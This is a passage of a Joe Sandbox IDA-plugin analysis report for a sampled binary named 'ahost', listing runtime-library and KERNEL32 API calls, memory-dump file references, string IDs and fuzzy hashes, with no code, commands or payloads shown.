                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA979
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA99E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205CA4
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F1A
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F2B
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F3C
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F920617C), ref: 00007FF7F9205F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                              • Instruction ID: 710ed636d11e49654cdae276d78bd6cf1d969b7de673a3ac37cbff5431a5bc76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8ED19122E0824246F7A4BF229C815B9A771FF44794FC48136DA6D876EDEF3DE44187A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: 3572768d45e12153d67653adfa5f92bef6f25672701e186a93ff6b9ec44830e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92315636A14B8186EB60DF25EC406AEB3B4FB84754F940135DB6D43BA8EF3CD1458750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction ID: 7b8449a01436663096f7b95f4e6704caa853049566eee64d0969f1d51890c5a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73B16322B1869641FBB1AF619D001B9E2B1BB44BD4F845131DA6D87BEEEF3CE441C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F1A
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F2B
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920561C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205F3C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920564C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F920617C), ref: 00007FF7F9205F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction ID: cd4cd10fa80ac667fd8eb97b98b36c1518a234e60b86e5ee5f59d4cb1265b996
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55513F22E1864286F750FF22DC815A9E771BB48784FC45235EA6DC76EADF3CE44087A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction ID: 158d4d0f7d346b61eb5bb1f57a7c546e3b59fed1c8b56825f712c44ee32d24f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB114F26B15B05CAFF40DF60EC442A973B4FB19758F440E31DA2D867A8DF38D1548390
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction ID: 868e334287396e94548900773e3376919c1d6e69da1cb376d50925973b1bc2dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27C10672B1D28687E764DF19A48467AF7A1FB94784F848134DB5E93798DB3DE800CB80
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                              • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction ID: cb30102dfb3b16d45ddf0d8e2508a7cf5820a4e51c73a5b706d1b5260eb38e06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F19472E043C58BE7E5BF159888A3ABAB9EF44740F864638DA59473D8CB38F540C791
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                              • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                              • Instruction ID: 4761d26f5233efe20cd85bbba54a91547e116f8af308cbbd8a3d95ff3b0d8603
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4B14A7BA04B898AEB55CF29C846368B7B0F744B48F548821DB6E837B8CB39D451C750
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                              • Instruction ID: 505d3e1b4ded44bc999210672bb4c66bc169548a86d9119f5d006b9e1e97f798
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7E1B532D0864A81EB68AE25A950139B370FF45BCCF944135DB7E0B6D8EF29E853C790
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                              • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                              • Instruction ID: 6e73ddd1b053085b489d0c87fc7396c78f6c161dd87be3ad5bd353e09c9f2248
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3691D872E182C687E7A5BE15E848B3E7AB9FB44340F514239DA6A467C4CB3CF540CB91
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                              • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                              • Instruction ID: 537df96a4f206d23c65c5d1c2d226942b8950fe629142e511c039bb1fb8202db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD516C63F1C2C945E7259E35AC0076AABA1E784B98F888231CB7C47AD9EF3DE4458750
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                              • Instruction ID: 5ee6f8e30f5bcc59bfad5b472d2e549bf6defdab43ead6c85e0f3d0229dd6988
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F02BD21E5D64641FB95BF11AC04279A6B0AF45BA0FD94634DE7D863EEEE3CA400C7B0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction ID: c51605e9ff23deb51811a133fdc832f4b5c9da7386ae6bf0b967a498a8d0ee0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FA14466E0878D46EB21DF25A8007B9BBA0AB61788F458031DFBD477C9EB3DD509C391
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                              • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                              • Instruction ID: c6bf534038462fe357fcd16a47d659d6082b495225558bde8650bd5f0fb66ac5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F517E11F0864A41FB68BE266D1117AD2A1AF84BC8BC84174DF3E477DEFE3CE45252A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
